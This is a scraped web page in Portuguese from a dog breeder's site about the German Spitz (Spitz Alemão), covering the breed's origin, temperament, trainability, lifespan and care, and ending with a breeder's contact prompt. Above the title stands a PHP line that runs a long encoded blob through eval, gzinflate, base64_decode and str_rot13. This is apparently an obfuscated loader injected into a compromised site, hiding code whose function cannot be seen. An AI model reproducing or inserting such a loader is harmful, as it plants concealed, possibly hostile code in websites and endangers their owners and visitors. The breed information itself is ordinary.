eval(gzinflate(base64_decode(str_rot13('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')))); spitz-alemao - Babylhotes

SOBRE A RAÇA

Spitz Alemão

Energia

Obediência

Inteligência

Territorialista

Apego ao dono

Tendência a latir

Com crianças

Com outros animais

O Spitz Alemão não tem sua descendência muito bem definida. No entanto, como a Alemanha é o lugar mais provável de seu surgimento, o país ficou gravado no nome da raça. Existem cinco tipos de Spitz, o anão, o pequeno, o médio, o grande e o gigante. Apesar disso, o anão é o que ficou mais conhecido e o que mais vemos por aí, especialmente no Brasil. Se trata de uma raça de cachorro de companhia muito dócil e brincalhona, que além de se dar muito bem com seus pais humanos. É muito afetuoso e não é considerado um cão agressivo, mas pode ser receoso com desconhecidos num primeiro momento. Em nosso país, ele também pode ser chamado de lulu da pomerânia. A raça já foi bastante popular no Brasil, mas desapareceu por algumas décadas e agora está voltando com força.

O Spitz Alemão é um cachorro muito dócil e companheiro, que se dá bem com seus tutores e gosta de brincar. No entanto, ele pode ser desconfiado com relação a visitas e pessoas de fora. Não costuma interagir com elas e late muito na presença de estranhos. Apesar de serem extrovertidos, também podem se mostrar ariscos e precisam de tempo para se adaptar às pessoas principalmente se não forem acostumados com esse tipo de rotina ainda quando filhotes. É preciso trabalhar a socialização do spitz para que ele se mostre mais equilibrado com aqueles que não conhece.

O Spitz Alemão é um cachorro muito esperto, curioso e bastante atento. Além disso, ele é um pet que demonstra desconfiança. Isso significa que ele vai ficar longe de pessoas desconhecidas até entender bem como elas são e ter certeza que não são uma ameaça para si ou para seus humanos. Apesar disso, são muito dóceis com toda sua família. Quando acreditam que alguma coisa está errada, ficam desconfiados e costumam latir com frequência quando se sentem ameaçados. Ele não gosta de ser comandado e pode ser bastante teimoso, resistindo a qualquer ordem. Devido a isso, educar esse cachorro é particularmente difícil e exige muito tempo e paciência. Apesar disso, ensinar truques e comandos é possível justamente por ser um cachorro curioso e, principalmente, brincalhão, disposto a jogos e brincadeiras.

Por ser um cachorro com problemas de saúde que aparecem muito raramente, a expectativa do Spitz Alemão é alta. Geralmente eles vivem entre 12 e 15 anos, mas se forem bem cuidados e viverem em um ambiente sem estresse, podem chegar aos 17 ou 18 anos.

Por terem pelos compridos, é necessário secar bem o Spitz Alemão depois do banho, para garantir que não cresçam fungos ali e que o cachorro não tenha dermatites. Além disso, por serem cães pequenos, tome cuidado com o saltos e corridas para ter certeza que eles não se machuquem. Como é um cão ativo, é necessário levá-lo para passear e realizar brincadeiras para que ele possa gastar sua energia todos os dias.

O Spitz Alemão anão é o mais comum entre as variações da raça. Por causa disso, eles receberam seu próprio apelido: Lulu da Pomerânia. Pomerânia é uma região que fica entre a Alemanha e a Polônia. É muito comum nessa raça os cachorros mudar de cor quando ficam adultos. Outra curiosidade é que dois cachorros foram resgatados do Titanic. E um deles era um Spitz Alemão. O outro era um pequinês.

Olá, procurando por um lindo filhote? Sou Mayara, criadora e responsável
Clique aqui para falar comigo!